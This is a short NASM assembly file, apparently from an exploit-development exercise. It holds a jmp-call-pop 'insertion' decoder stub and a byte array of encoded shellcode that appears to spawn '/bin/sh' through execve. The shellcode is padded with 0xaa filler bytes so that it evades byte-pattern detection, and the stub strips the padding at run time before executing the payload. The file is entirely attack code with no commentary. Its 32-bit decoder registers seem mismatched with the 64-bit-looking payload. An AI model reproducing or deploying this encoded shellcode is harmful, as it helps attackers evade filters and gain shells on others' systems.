; Insertion-Decoder.nasm
; Author: Ravehorn

global _start

section .text

_start:

    jmp short call_decoder

decoder:
    
    pop esi
    lea edi, [esi + 1]
    xor eax, eax
    mov al, 1
    xor ebx, ebx
    
decode:

    mov bl, byte [esi + eax]
    xor bl, 0xaa
    jnz short shellcode
    mov bl, byte [esi + eax + 1]
    mov byte [edi], bl
    inc edi
    add al, 2
    jmp short decode

call_decoder:

    call decoder

    shellcode: db 0x31, 0xaa, 0xc0, 0xaa, 0x48, 0xaa, 0xbb, 0xaa, 0xd1, 0xaa, 0x9d, 0xaa, 0x96, 0xaa, 0x91, 0xaa, 0xd0, 0xaa, 0x8c, 0xaa, 0x97, 0xaa, 0xff, 0xaa, 0x48, 0xaa, 0xf7, 0xaa, 0xdb, 0xaa, 0x53, 0xaa, 0x54, 0xaa, 0x5f, 0xaa, 0x99, 0xaa, 0x52, 0xaa, 0x57, 0xaa, 0x54, 0xaa, 0x5e, 0xaa, 0xb0, 0xaa, 0x3b, 0xaa, 0x0f, 0xaa, 0x05, 0xaa, 0xbb, 0xbb